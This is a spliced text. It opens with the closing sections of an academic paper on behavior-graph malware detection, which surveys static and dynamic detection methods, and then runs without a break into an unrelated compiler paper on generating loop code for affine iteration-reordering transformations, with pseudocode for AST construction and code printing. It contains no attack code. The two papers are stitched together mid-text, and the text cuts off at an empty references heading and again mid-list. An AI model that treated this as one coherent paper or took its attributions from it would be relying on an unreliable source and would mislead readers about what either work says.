The hope is that such properties capture intrinsic characteristics of a malware program and thus, are more difficult to disguise. One such property is the distribution of character n-grams in a file [26, 27]. This property can help to identify embedded malicious code in other file types, for example, Word documents. Another property is the control flow graph (CFG) of an application, which was used to detect polymorphic variants of malicious code instances that all share the same CFG structure [8, 24]. More sophisticated static analysis approaches rely on code templates or specifications that capture the malicious functionality of certain malware families. Here, symbolic execution [25], model checking [21], or techniques from compiler verification [13] are applied to recognize arbitrary code fragments that implement a specific function. The power of these techniques lies in the fact that a certain functionality can always be identified, independent of the specific machine instructions that express it. Unfortunately, static analysis for malware detection faces a number of significant problems. One problem is that current malware programs rely heavily on run-time packing and self-modifying code [46]. Thus, the instructions present in the binary on disk are typically different from those executed at runtime. While generic unpackers [40] can sometimes help to obtain the actual instructions, binary analysis of obfuscated code is still very difficult [30]. Moreover, most advanced static analysis approaches are very slow (on the order of minutes per sample [13]). This makes them unsuitable for detection in real-world deployment scenarios. Dynamic analysis. Dynamic analysis techniques detect malicious code by analyzing the execution of a program or the effects that this program has on the platform (operating system). An example of the latter category is Strider GhostBuster [51].
The tool compares the view of the system provided by a possibly compromised OS to the view that is gathered when accessing the file system directly. This can detect the presence of certain types of rootkits that attempt to hide from the user by filtering the results of system calls. The work that most closely relates to our own is Christodorescu et al. [12]. In [12], malware specifications (malspecs) are extracted by contrasting the behavior of a malware instance against a corpus of benign behaviors. Similarly to our behavior graphs, malspecs are DAGs where each node corresponds to a system call invocation. However, malspecs do not encode arbitrary data flow dependencies between system call parameters, and are therefore less specific than the behavior graphs described in this work. As discussed in Section 4, using behavior graphs for detection without verifying that complex dependencies hold would lead to an unacceptably large number of false positives. In [22], a dynamic spyware detector system is presented that feeds browser events into Internet Explorer Browser Helper Objects (i.e., BHOs – IE plugins) and observes how the BHOs react to these browser events. An improved, tainting-based approach called Tquana is presented in [16]. In this system, memory tainting on a modified Qemu analysis environment is used to track the information that flows through a BHO. If the BHO collects sensitive data, writes this data to the disk, or sends this data over the network, the BHO is considered to be suspicious. In Panorama [54], whole-system taint analysis is performed to detect malicious code. The taint sources are typically devices such as a network card or the keyboard. In [44], bots are detected by using taint propagation to distinguish between behavior that is initiated locally and behavior that is triggered by remote commands over the network. In [29], malware is detected using a hierarchy of manually crafted behavior specifications.
To obtain acceptable false positive rates, taint tracking is employed to determine whether a behavior was initiated by user input. Although such approaches may be promising in terms of detection effectiveness, they require taint tracking on the end host to be able to perform detection. Tracking taint information across the execution of arbitrary, untrusted code typically requires emulation. This causes significant performance overhead, making such approaches unsuitable for deployment on end users' machines. In contrast, our system employs taint tracking when extracting a model of behavior from malicious code, but it does not require tainting to perform detection based on that model. Our system can, therefore, efficiently and effectively detect malware on the end user's machine. Dialog rewriting. In their technical report [9], the authors present Rosetta, a system that extracts relationships (transformation functions) between input and output fields of network protocols. These relationships are needed to compute the correct values of dynamic fields when performing protocol replay or NAT rewriting. To extract transformation functions, the authors use binary analysis, dynamic program slicing, and symbolic execution. Their approach resembles the techniques that we use for inferring complex dependencies between system call arguments. Of course, there are also significant differences between their work and ours. First, the problem domain and the goals of the two systems are entirely different. Second, we use symbolic execution as an optimization step and can execute functions (slices) even when no symbolic formula can be found. 7 Conclusion Although a considerable amount of research effort has gone into malware analysis and detection, malicious code still remains an important threat on the Internet today. Unfortunately, existing malware detection techniques have serious shortcomings, as they are based on ineffective detection models.
For example, signature-based techniques that are commonly used by anti-virus software can easily be bypassed using obfuscation or polymorphism, and system call-based approaches can often be evaded by system call reordering attacks. Furthermore, detection techniques that rely on dynamic analysis are often effective, but too slow, and hence inefficient, to be used as real-time detectors on end user machines. In this paper, we proposed a novel malware detection approach. Our approach is both effective and efficient, and thus, can be used to replace or complement traditional AV software at the end host. Our detection models cannot be easily evaded by simple obfuscation or polymorphic techniques as we try to distill the behavior of malware programs rather than their instance-specific characteristics. We generate these fine-grained models by executing the malware program in a controlled environment, monitoring and observing its interactions with the operating system. The malware detection then operates by matching the automatically-generated behavior models against the runtime behavior of unknown programs. Acknowledgments The authors would like to thank Christoph Karlberger for his invaluable programming effort and advice concerning the Windows kernel driver. This work has been supported by the Austrian Science Foundation (FWF) and by Secure Business Austria (SBA) under grants P-18764, P-18157, and P-18368, and by the European Commission through project FP7-ICT-216026-WOMBAT. Xiaoyong Zhou and Xiaofeng Wang were supported in part by the National Science Foundation Cyber Trust program under Grant No. CNS-0716292. References
Abstract There has been a great amount of recent work toward unifying iteration reordering transformations. Many of these approaches represent transformations as affine mappings from the original iteration space to a new iteration space. These approaches show a great deal of promise, but they all rely on the ability to generate code that iterates over the points in these new iteration spaces in the appropriate order. This problem has been fairly well-studied in the case where all statements use the same mapping. We have developed an algorithm for the less well-studied case where each statement uses a potentially different mapping. Unlike many other approaches, our algorithm can also generate code from mappings corresponding to loop blocking. We address the important trade-off between reducing control overhead and duplicating code. This work is supported by an NSF PYI grant CCR-9157384 and by a Packard Fellowship. 1 Introduction Optimizing compilers apply iteration reordering transformations for a variety of reasons. By changing the order of computations in a loop, these transformations can expose parallelism and improve data locality.
They can also be used together with other techniques to improve the efficiency of SPMD code, for example, by moving communication statements out of loops, or by restructuring loops to avoid the execution of iterations which do no work.

Traditionally, reordering transformations have been applied as a sequence of pre-specified transformations such as loop interchange, loop distribution, skewing, tiling, index set splitting and statement reordering [21]. Each of these transformations has its own legality checks and transformation rules. These checks and rules make it hard to analyze or predict the effects of a sequence of these transformations without actually performing the transformations and analyzing the resulting code.

This complexity has inspired a great deal of recent work toward unified systems for iteration reordering transformations [3, 20, 15, 10, 8]. These approaches use a variety of formalisms, but most can be considered as special cases of a formalism we have developed [12]. In our formalism, transformations are represented as one-to-one mappings from the original iteration space to a new iteration space. We allow a potentially different mapping to be used for each atomic statement. We restrict the mappings to be those that can be represented using affine constraints. Unimodular transformations can be viewed as the special case where there is a single atomic statement (the body of a set of perfectly nested loops) and the mapping is restricted to be linear and onto. The extended unimodular transformations developed by Li and Pingali [15] remove the onto restriction. The schedules produced by Feautrier [10] are not, by themselves, one-to-one, but when they are combined with the space mappings, they become one-to-one. Feautrier allows a potentially different schedule to be used for each atomic statement. Schedules are also used by a number of other researchers [14, 8].
We use the following notation to represent the mapping used for statement \( s_p \): \[ T_p : [i_1, \ldots, i_m] \rightarrow [f_1, \ldots, f_n] \] where: - \( i_1, \ldots, i_m \) are the index variables of the loops nested around statement \( s_p \). - The \( f_j \)'s (called mapping components) are quasi-affine functions [1] of the iteration variables and symbolic constants. This mapping represents the fact that iteration \([i_1, \ldots, i_m]\) in the original iteration space of statement \( s_p \) is mapped to iteration \([f_1, \ldots, f_n]\) in the new iteration space. Finding legal mappings that produce efficient code is an important and difficult problem, but is not discussed in this paper. We refer interested readers to our earlier work in that area [12, 11, 13]. This paper deals with the problem of generating transformed code given an original program and a mapping. This involves creating loops and conditionals that iterate over all and only those points in the new iteration space. When each statement uses the same mapping, and that mapping is linear and onto, code generation is relatively simple. If we start with a convex iteration space and apply a one-to-one and onto mapping, then the transformed iteration space will also be convex. The problem of generating perfectly nested loops to iterate over all and only those points in such a convex region has been studied by a number of researchers starting with the seminal work of Ancourt and Irigoin [1]. If the original iteration space is non-convex (as a consequence of non-unit loop steps), or if the mapping applied is not onto, then the transformed iteration space may be non-convex. In these cases it is still possible to generate suitable perfectly nested loops; however, some of the loop steps will be non-unit. Techniques for handling this case are described by Li and Pingali [15]. Our work addresses the case where a potentially different mapping is used for each statement. 
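As a concrete illustration, a mapping of this form can be modeled as a function from old iteration tuples to new iteration tuples. The sketch below (illustrative Python, not the paper's constraint-based implementation; the mapping chosen is a hypothetical skew) applies \( T : [i, j] \rightarrow [i + j, j] \) to a small iteration space and checks that it is one-to-one on that space:

```python
# Illustrative model of a statement mapping T_p: each new coordinate is an
# affine function of the old index variables.

def T(point):
    i, j = point
    return (i + j, j)  # f_1 = i + j, f_2 = j

old_space = [(i, j) for i in range(1, 4) for j in range(1, 3 + 1)]
new_space = [T(p) for p in old_space]

# One-to-one on this space: no two old iterations map to the same new tuple.
assert len(set(new_space)) == len(old_space)

# The transformed program visits the mapped tuples in lexicographic order.
execution_order = sorted(new_space)
```

Sorting the mapped tuples models the requirement that the generated code enumerate the new iteration space lexicographically.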
The corresponding transformed iteration space can be “very” non-convex; that is, there is no set of perfectly nested loops without conditionals, even with non-unit steps, that can scan the space. The simplest code for a non-convex iteration space scans the convex hull of the space, and tests the conditions under which each statement should be executed at the innermost level. This method can incur a high control overhead. We can eliminate control overhead by breaking the convex hull into a sequence of smaller, tighter regions, which eliminates the need for conditionals at the expense of code duplication. Figure 1 shows an example of this. Eliminating control overhead tends to be particularly important for transformations that radically alter the structure of the original program such as when loop blocking is performed or when the transformed iteration spaces of different statements overlap in complex ways. Our algorithm can be summarized as follows: We first construct an abstract syntax tree (AST) that defines an initial structure of the loops and conditions. In determining the initial structure we try to introduce as little control overhead as possible under the restriction that no code duplication is introduced. 
Code generated for the iteration spaces:

    I_1 : {(i, j) : 1 ≤ i ≤ 10 ∧ j = 1}
    I_2 : {(i, j) : 1 ≤ i ≤ 5 ∧ 1 ≤ j ≤ 10}

Code with no duplication:

    for i = 1 to 10
      for j = 1 to 10
        if (j = 1) s1[i, j]
        if (i ≤ 5) s2[i, j]

Code with no avoidable control overhead:

    for i = 1 to 5
      s1[i, 1]
      for j = 1 to 10
        s2[i, j]
    for i = 6 to 10
      s1[i, 1]

Figure 1: Control overhead versus code duplication

Section 3 describes the structure of our abstract syntax trees, and Section 4 describes how we determine an initial AST that produces no code duplication. Next, we augment this tree with more detailed information regarding the conditions and loop bounds of the conditionals and loops respectively. This is described in Section 5. Next we consider the problem of removing control overhead. Sources of overhead nested inside the most loops will be executed most frequently and are the most important to remove. But further removing overhead requires code duplication and an increase in code size. This trade-off is controlled by specifying the depths from which overhead will be eliminated. This optimization algorithm is described in Section 7. Once we have performed this optimization, we generate the actual code using the abstract syntax tree and the information that it contains. Section 6 describes how to generate code from an AST.
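The Figure 1 trade-off can be checked with a small simulation (illustrative Python, not the paper's generated code): both versions execute exactly the same statement instances, but the version with no duplication evaluates two guards on every iteration of the full nest.

```python
# Simulate both Figure 1 code versions and compare the executed statement
# instances and the number of run-time guard tests.

def no_duplication():
    executed, guard_tests = [], 0
    for i in range(1, 11):
        for j in range(1, 11):
            guard_tests += 2          # one test per statement guard
            if j == 1:
                executed.append(("s1", i, j))
            if i <= 5:
                executed.append(("s2", i, j))
    return executed, guard_tests

def no_overhead():
    executed = []
    for i in range(1, 6):
        executed.append(("s1", i, 1))
        for j in range(1, 11):
            executed.append(("s2", i, j))
    for i in range(6, 11):            # duplicated s1 loop
        executed.append(("s1", i, 1))
    return executed, 0                # no guards evaluated at run time

a, tests_a = no_duplication()
b, tests_b = no_overhead()
assert sorted(a) == sorted(b)         # same statement instances
assert tests_a == 200 and tests_b == 0
```

The second version pays for the eliminated 200 guard evaluations with a duplicated copy of the s1 loop.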
Before describing the actual algorithm we first summarize the Omega library, a set of routines that we use to represent and manipulate sets of affine constraints, in Section 2.

2 The Omega library

Many code generation algorithms use linear algebra to represent and manipulate sections of iteration spaces. We use higher-level abstractions called tuple sets and tuple relations. An integer \( k \)-tuple is a point in \( \mathbb{Z}^k \). A tuple relation is a mapping from tuples to tuples, and a tuple set is a set of tuples.

    restrict_domain(R, S)      { i → j | i → j ∈ R ∧ i ∈ S }
    range(R)                   { j | i → j ∈ R }
    project(S, 1...r)          { [t_1, ..., t_r] | ∃ integers t_{r+1}, ..., t_n s.t. [t_1, ..., t_r, t_{r+1}, ..., t_n] ∈ S }
    gist(S, K)                 least constrained set S' s.t. (S' ∧ K) ⇔ (S ∧ K)
    convex_hull({S_1,...,S_m}) TupleSet represented by constraints { c | c part of some S_i ∧ ∀ j = 1...m, S_j ⇒ c }

Figure 2: Functions provided by the Omega Library

Tuple relations and sets are represented using the Omega Library [16, 18], which is a set of routines for manipulating affine constraints over integer variables. The relations and sets may involve symbolic constants such as n in the following example: \{ [i] \rightarrow [i+1] \mid 1 \leq i \leq n \}. They may also involve existentially quantified variables such as a in the following example: \{ [i] \mid \exists a \text{ s.t. } i = 2a \land 1 \leq i \leq 10 \}. Relationships between the variables are represented by a disjunction of conjunctions of affine constraints. Figure 2 gives a brief description of the operations on tuple relations and sets that we use in code generation. All operators return their results in the simplest form possible, i.e., redundant constraints are always detected and removed.
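For intuition, some of these operations can be modeled naively on finite, explicit sets (a sketch only; the real library works symbolically on affine constraints and handles symbolic constants):

```python
# Finite-set models of three Omega operations.

def restrict_domain(R, S):
    # { i -> j in R | i in S }
    return {(i, j) for (i, j) in R if i in S}

def rel_range(R):
    # { j | i -> j in R }
    return {j for (_, j) in R}

def project(S, r):
    # keep only the first r coordinates of every tuple
    return {t[:r] for t in S}

# R models { [i] -> [i+1] | 1 <= i <= 5 }.
R = {(i, i + 1) for i in range(1, 6)}
assert rel_range(restrict_domain(R, {1, 2, 3})) == {2, 3, 4}

pts = {(i, j) for i in range(1, 4) for j in range(1, 3)}
assert project(pts, 1) == {(1,), (2,), (3,)}
```

`gist` and `convex_hull` have no such simple finite model, since their results are sets of constraints rather than sets of points.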
3 Code Structure

This section describes the abstract syntax trees (ASTs) that we use to define the structure of the loops and conditions. An AST can contain three types of nodes:

split nodes - This type of node is labeled with a condition \( c \) and has two children named true_child and false_child. A node of this type corresponds to a sequence of two code fragments. The first code fragment will execute iterations that satisfy the condition \( c \) and all of the conditions contained in split nodes above the current one; the second will execute iterations that satisfy the negation of \( c \) and those same conditions. The true_child defines the structure of the first code fragment and the false_child defines the structure of the second code fragment. The condition must be such that the iterations executed by the true branch are lexicographically less than the iterations executed by the false branch.

loop nodes - This type of node is labeled with an index variable \( i_k \) and has only one child. A node of this type corresponds to a for loop, possibly surrounded by a conditional statement. The for loop iterates over all valid values of the index variable \( i_k \): a value of \( i_k \) is valid if there exists an iteration \([i_1,...,i_n]\) of some statement \( s \) that takes that value and satisfies all of the conditions contained in split nodes above the current node. The conditional statement is inserted, if necessary, to enforce constraints contained in split nodes above the current node that don't involve the current index variable and to ensure that at least one iteration of the for loop will be executed.

leaf nodes - As its name implies, this type of node has no children. A node of this type corresponds to a sequence of atomic statements. Each atomic statement is surrounded, if necessary, by a conditional statement to ensure that only those iterations that satisfy all of the conditions contained in split nodes above the current node are executed.

Every path from the root to a leaf contains \( n \) loop nodes labeled with index variables \( i_1,...,i_n \) in that order.
The condition in a split node refers only to index variables \( i_1,...,i_k \), where \( i_k \) is the label of the first loop node below that split node. Figure 3 contains an example of an AST and its corresponding code.

4 Initial code structure

In this section we describe how to construct the AST that defines the initial structure of the loops and conditions. In the initial structure we try to introduce as little control overhead as possible, under the restriction that no code is duplicated. If we were to use this initial structure to generate code, then we would obtain code that is correct but might contain too much overhead. In Section 7 we describe how to modify the initial structure to decrease overhead at the expense of increased code size. The algorithm to construct the initial AST is given in Figure 4 and explained below.

Our first step is to compute the new iteration spaces belonging to each of the statements. We restrict the domains of the mappings to the original iteration spaces. The new iteration spaces are the ranges of these restricted mappings. These new iteration spaces may be disjoint or may overlap. We need to generate code that will execute each statement at all and only those points in its respective iteration space. The new code must also execute the iterations in lexicographical order based on the new coordinate system. Since the new iteration spaces may overlap, the new code may have to interleave the execution of different statements. At this stage, we calculate only the basic structure of the loop nests, not the loop bounds. We will create nested loops to iterate over all of the points \([t_1, \ldots, t_n]\) in the new iteration spaces. The outermost loop will iterate over the appropriate values of \(t_1\), the next outermost loop iterates over the appropriate values of \(t_2\), and so on. We build the initial AST in a depth-first fashion.
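The key test in this construction is whether a candidate split condition separates the active statements into two disjoint, non-empty groups; only then can the range of an index variable be split without duplicating code. A finite-set sketch (illustrative Python, not the actual constraint-based implementation), using the Figure 1 iteration spaces:

```python
# split_active models the test applied to a candidate split condition c on
# t_k: the split is usable only if the statements active on each side form
# disjoint, non-empty sets.

def split_active(active, I_level, c):
    # I_level[s]: set of t_k values statement s needs; c: predicate on t_k
    active1 = {s for s in active if any(c(t) for t in I_level[s])}
    active2 = {s for s in active if any(not c(t) for t in I_level[s])}
    ok = bool(active1) and bool(active2) and not (active1 & active2)
    return ok, active1, active2

# Figure 1 at the i level: s1 needs i = 1..10, s2 needs i = 1..5.
ok, a1, a2 = split_active(
    {"s1", "s2"},
    {"s1": set(range(1, 11)), "s2": set(range(1, 6))},
    lambda i: i <= 5)
assert not ok      # s1 is active on both sides: this split would duplicate it

# Statements with disjoint ranges can be split without duplication.
ok, a1, a2 = split_active(
    {"s1", "s2"},
    {"s1": set(range(1, 6)), "s2": set(range(6, 11))},
    lambda i: i <= 5)
assert ok and a1 == {"s1"} and a2 == {"s2"}
```

The first case is exactly why the initial AST for Figure 1 keeps both statements under one loop and defers the split to the optimization phase.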
At each stage of this construction process, we try to find a suitable condition \(c\) on which to split the range of values of the next index variable \(t_k\). The idea is that generating two tighter loops for this index variable, rather than one looser loop, will allow us to eliminate some more deeply nested source of control overhead. However, the initial AST must not produce any code duplication, so these split conditions must be chosen such that the new ranges will have disjoint, non-empty sets of active statements. A statement is active if it possesses an iteration that needs to be executed in the branch of the AST currently being constructed. For each active statement, we compute the constraints on \(t_k\) for iterations of that statement in terms of \(t_1, \ldots, t_{k-1}\). We then check to see if any of these constraints satisfy the above requirements. If such a condition \(c\) exists, we generate a split node with \(c\) as the condition, and calculate the set of active statements for each branch. If necessary, we adjust \(c\) so that values of \(t_k\) that satisfy it are less than those that do not. We then recursively determine the structure of the child nodes. If no such \(c\) exists, then there is no way to further partition the range of \(t_k\) without duplicating code. So, we generate a loop node here for \(t_k\) (making \(t_{k+1}\) the next index variable). After loops have been generated for each index variable, we generate a leaf node.

5 Evaluating node attributes

In this section we describe how to augment the AST with more detailed information regarding the conditions and loop bounds of the conditionals and loops.
**Original code**

```
for k = 1 to n
  for i = k+1 to n
    s(i,k) = s(i,k) / s(k,k)
    for j = k+1 to n
      s(i,j) = s(i,j) - s(i,k) * s(k,j)
```

**Mappings** (64 × 64 blocking)

\[ T_1 : \{[k, i] \rightarrow [64((k-1)\ \text{div}\ 64)+1,\ 64((i-1)\ \text{div}\ 64)+1,\ k,\ k,\ i]\} \]
\[ T_2 : \{[k, i, j] \rightarrow [64((k-1)\ \text{div}\ 64)+1,\ 64((i-1)\ \text{div}\ 64)+1,\ j,\ k,\ i]\} \]

**New iteration spaces** \( I_1 \) and \( I_2 \): the ranges of \( T_1 \) and \( T_2 \) restricted to the original iteration spaces.

**Initial AST** (a tree of split, loop and leaf nodes over \( t_1, \ldots, t_5 \))

**Code corresponding to the initial AST**

```
for t1 = 1 to n-1 step 64
  for t2 = t1 to n step 64
    for t3 = t1 to n
      if t1 < t3 then
        for t4 = t1 to min(t1+63, t3-1, n-1)
          for t5 = max(t2, t4+1) to min(t2+63, n)
            s2[t4, t5, t3]
      if t3 <= t1+63 and t3 <= n-1 then
        for t5 = max(t2, t3+1) to min(t2+63, n)
          s1[t3, t5]
```

Figure 3: Initial blocked LU decomposition

Generate_Initial_AST (T, old_IS)

INPUT:
- old_IS : array [maxStmts] of TupleSet; old_IS[p] is the iteration space of statement p in the original code.

OUTPUT:
- An AST node which is the root of the tree that represents the structure of the code.

ALGORITHM:

```
foreach statement s
  new_IS[s] = range(restrict_domain(T[s], old_IS[s]))
  for L = 1 to last_level
    I[s, L] = project(new_IS[s], 1...L)
return Partition(1, {all stmts}, I)
```

Partition (level, active, I)

INPUT:
- level : integer; loop levels 1, ..., level-1 have already been generated and should be considered fixed.
- active : set of statements; the statements for which code should be generated.
- I : array [maxStmts, maxLevels] of TupleSet; I[s, L] is the new iteration space of statement s projected onto the symbolic constants and the index variables at levels 1...L.
OUTPUT:
- An AST node which is the root of the tree that represents the structure of the code.

ALGORITHM:

```
if level = last_level then
  return AST_Leaf()
if ∃ constraint c ∈ I[s, level], for some s, s.t.
     active1 ≠ ∅ ∧ active2 ≠ ∅ ∧ active1 ∩ active2 = ∅
   where active1 = { s : s ∈ active ∧ {c} ∩ I[s, level] is satisfiable }
   and   active2 = { s : s ∈ active ∧ {¬c} ∩ I[s, level] is satisfiable }
then
  return AST_Split(level, c, Partition(level, active1, I),
                             Partition(level, active2, I))
else
  return AST_Loop(level, Partition(level+1, active, I))
```

Figure 4: Algorithm to construct the initial AST

This information is initially used to identify sources of control overhead (see Section 7), and later to generate the actual code (see Section 6). This algorithm is performed on the initial AST and later on the sub-trees of the AST that are modified by the optimization phase. The algorithm is given in Figure 5 and is explained below. The algorithm performs a depth-first traversal of the AST, evaluating attributes of the nodes as it goes. As we move down the tree we maintain two tuple sets: restrictions and known. The tuple set restrictions contains all constraints from split nodes between the current node and the nearest loop node above. The tuple set known contains all constraints enforced by conditionals and loop bounds above the current node. These tuple sets define the current context; that is, the subsets of the iteration spaces that the code corresponding to the current sub-tree will have to iterate over. We wish to maintain the property that for every split node, both subtrees represent at least one iteration of some statement. So, when we come to a split node, we check that such iterations exist, and if not, we remove the split node, replacing it with the appropriate child node.
In evaluating a loop node at level \( k \), we compute three things: the statements that should be executed in the loop body, the conditions under which the loop should be executed, and the values of the current index variable \( t_k \) the loop should enumerate. We first determine which statements will need to be executed in that loop (those whose iteration spaces intersect \( \text{restrictions} \cap \text{known} \)). Given that set of statements, and the constraints in \( \text{known} \) and \( \text{restrictions} \), we want to find the strongest conditional and the tightest loop bounds that will not exclude any iterations in those statements' iteration spaces. Any constraints in \( \text{restrictions} \) can be enforced, since any iterations a given constraint excludes will be included in the other subtree of that constraint's split node.

**Evaluate** (node, known, restrictions)

**INPUT:**
- node: AST_node, the root of the subtree to be evaluated
- known: TupleSet, constraints on index variables and symbolic constants that have been enforced by loop nodes above
- restrictions: TupleSet, constraints on the current index variable that specify the region whose subtree is being evaluated

**OUTPUT:**
- This function computes tuple sets that represent the guards and loop bounds for loop nodes and the guards for leaf nodes.

**ALGORITHM:**

```plaintext
if (node.type == AST_split)
  if (¬∃ statement s s.t.
      I[s, node.level] ∩ known ∩ restrictions ∩ node.condition is satisfiable)
    remove node and replace it with node.false_side
    Evaluate (node.false_side, known, restrictions)
  elseif (¬∃ statement s s.t.
      I[s, node.level] ∩ known ∩ restrictions ∩ ¬node.condition is satisfiable)
    remove node and replace it with node.true_side
    Evaluate (node.true_side, known, restrictions)
  else
    Evaluate (node.true_side, known, restrictions ∩ node.condition)
    Evaluate (node.false_side, known, restrictions ∩ ¬node.condition)
elseif (node.type == AST_loop)
  foreach statement s
    active[s] = (I[s, node.level] ∩ restrictions ∩ known) is satisfiable
  bounds = convex_hull(∪_{s : active[s]} I[s, node.level]) ∩ known ∩ restrictions
           ∩ greatest_common_step(active, node.level, I)
  needsCheck = gist(bounds, known)
  node.guard = project(needsCheck, 1...node.level-1)
  node.loop = gist(needsCheck, node.guard)
  Evaluate (node.child, bounds, True)
elseif (node.type == AST_leaf)
  foreach statement s
    node.guard[s] = gist(new_IS[s] ∩ restrictions ∩ known, known)
```

Figure 5: Evaluate Algorithm

We want to add further constraints on \( t_k \) so that the loop only iterates over those points for which at least one iteration of some statement is executed. For example, consider the two iteration spaces:
\[ I_1 = \{i \mid 1 \leq i \leq 5\} \\ I_2 = \{i \mid 1 \leq i \leq 10\} \]
Unless we enforce the constraints \( 1 \leq i \) and \( i \leq 10 \), the loop would iterate over points (such as \( i = 11 \)) which do not correspond to an iteration of any statement. However, if we were to add the constraint \( i \leq 5 \), which is not on the convex hull of the union of the two spaces, we would erroneously exclude required iterations of statement 2 (\( 6 \leq i \leq 10 \)). There are also some non-convex constraints that we can enforce. We collect together all stride constraints of the form \( \exists \beta \text{ s.t. } t_k = a_p\beta + b_p \) (where \( a_p \) is an integer coefficient and \( b_p \) is an affine function of symbolic constants and outer level index variables) that are associated with statements in the loop.
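A finite-set check of this example (taking \( I_2 = \{i \mid 1 \leq i \leq 10\} \), consistent with the bounds \( 1 \leq i \) and \( i \leq 10 \) enforced in the text; illustrative Python only):

```python
# Bounds enforced at a loop node come from the convex hull of the union of
# the active statements' iteration spaces. A constraint belonging to only
# one statement (i <= 5 below) must not be enforced on the shared loop.

I1 = set(range(1, 6))    # {i | 1 <= i <= 5}
I2 = set(range(1, 11))   # {i | 1 <= i <= 10}

union = I1 | I2
hull_lo, hull_hi = min(union), max(union)
assert (hull_lo, hull_hi) == (1, 10)

# Hull bounds lose no required iterations:
assert all(hull_lo <= i <= hull_hi for i in union)
# Enforcing i <= 5 would drop required iterations of statement 2:
assert any(i > 5 for i in I2)
```

The excluded constraint instead becomes a guard (or, after optimization, a split) rather than a loop bound.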
We then calculate the *greatest common step* of the loop as follows:
\[ gcs = \gcd\left(\{a_p \mid s_p \text{ is active}\} \cup \{\gcd(b_q - b_p) \mid s_q \text{ and } s_p \text{ are active}\}\right) \]
The gcd of an expression is defined to be the gcd of the coefficients in the expression. We can enforce the constraint
\[ \exists \beta \text{ s.t. } t_k = gcs\,\beta + b_p \]
where \( s_p \) is an arbitrary statement in the loop, by making \( gcs \) the loop step and suitably modifying the lower bound so that it satisfies this constraint. The loop step may not enforce all of the stride constraints on statements in the loop, but we cannot add anything stronger without excluding required iterations. Any remaining stride constraints will be enforced later. To construct the full set of constraints to be enforced at the loop, we intersect the convex hull of the active statements' iteration spaces with known, restrictions, and the greatest common step. We use the gist operation to remove any constraints that are implied by known and thus will be enforced at earlier loop nodes. Once we have determined which constraints can be enforced at this point, we divide them into those that can be enforced in the conditional statement and those that must be enforced by the for loop.

To evaluate a leaf node we determine which atomic statements will need to be executed. For each statement that needs to be executed, we calculate the constraints for its iteration space that are not implied by the surrounding loops and conditionals.

6 Generating code from an AST

Generating code in a high-level language is straightforward once we have evaluated the attributes of the AST. The algorithm performs a depth-first traversal of the AST, generating the code as it goes. When we come to a split node, we generate code for the true child and then generate code for the false child.
We do not generate a conditional statement at this point; rather, it is the responsibility of the code generated for the child nodes to execute only the appropriate iterations. When we come to a loop node we generate a for loop and possibly a conditional statement around that for loop. In the case where we can prove that at most one iteration can execute, we can avoid generating a loop. If the condition attribute of the loop node is not a tautology then an if statement is generated to check this condition.

Generating the for loop from the bounds attribute of the loop node is slightly more complicated, since the semantics of for loops are not defined in terms of (multiple) lower bounds, (multiple) upper bounds and stride constraints. Instead, they are defined in terms of an initial value, a single bound and a step (the bound is either an upper or lower bound, depending on the sign of the step). Since the code we generate enumerates the iteration space in lexicographical order, we need only consider positive steps. We now need to calculate the initial value: the smallest integer that satisfies both the lower bounds and the stride constraint. Assume that we have a lower bound of the form \( L \leq m t_k \), where \( L \) is a function of outer loop index variables and symbolic constants and \( m \) is an integer coefficient. If there is no stride constraint, the initial value implied by this lower bound is \( \text{CeilDiv}(L, m) \), where \( \text{CeilDiv}(a, b) \) is a function that computes \( \lceil a/b \rceil \). If there is a stride constraint of the form \( \exists \beta \text{ s.t. } t_k = c + s\beta \), the step will be \( s \) and the smallest integer that satisfies both the lower bound and the stride constraint is \( \text{CeilDiv}(\text{CeilDiv}(L, m) - c, s) \cdot s + c \). In a number of cases, we can generate simpler formulas.
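The initial-value formula can be sketched directly (illustrative Python; the helper names are ours, not the library's):

```python
def ceil_div(a, b):
    # CeilDiv(a, b) = smallest integer >= a/b, for b > 0
    return -((-a) // b)

def initial_value(L, m, c, s):
    # Smallest t_k with L <= m*t_k and t_k = c + s*beta for some integer beta:
    # round the plain lower bound up to the next member of the stride class.
    lo = ceil_div(L, m)
    return ceil_div(lo - c, s) * s + c

# Lower bound 7 <= 2*t_k gives t_k >= 4; with stride t_k = 1 + 3*beta the
# admissible values are ..., 1, 4, 7, ..., so the loop starts at 4.
assert initial_value(7, 2, 1, 3) == 4
```

When there is no stride constraint this degenerates to `ceil_div(L, m)` (equivalently, `s = 1`, `c = 0`).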
For example, we can generate simpler formulas when \( m = 1 \) or when we can determine that \( \text{CeilDiv}(L, m) \) is always a solution to the stride constraint. For space reasons, we do not detail these here. Finally, we convert multiple lower or upper bounds into a single bound using \( \max \) or \( \min \) respectively.

When we come to a leaf node we generate code in turn for each active statement. If the guard attribute for a statement is not a tautology then a conditional statement is generated to test this condition. The statements themselves are unchanged from the original program, except that the old index variables are replaced by appropriate functions of the new loop variables. Since the mapping is one-to-one, these functions can be easily determined by simply inverting the mapping.

PrintNode (node)

INPUT:
- node : AST_node, the node for which we are generating code.

OUTPUT:
- for loops and if statements to execute the AST.

ALGORITHM:

```
if (node.type == AST_split)
  PrintNode (node.true_side)
  PrintNode (node.false_side)
elseif (node.type == AST_loop)
  if (node.guard is not a tautology)
    print If (node.guard) then
  print Loop (node.level, node.loop)
  PrintNode (node.child)
elseif (node.type == AST_leaf)
  foreach statement s
    if (node.guard[s] is satisfiable)
      if (node.guard[s] is not a tautology)
        print If (node.guard[s]) then
      print Statement (s, T[s])
```

Figure 6: Print Code Algorithm

7 Optimizing the code structure

Having generated an initial AST that does not duplicate code, we now consider optimizations that reduce execution time overhead at the cost of an increase in code size. We consider three types of overhead in our implementation: guards around loops, guards around atomic statements, and min's and max's in loop bounds. Zero trip loops are also a potential source of overhead; we generate guards to ensure that loops have at least one iteration, so this problem reduces to the case of guards around loops. We remove overhead as follows: 1.
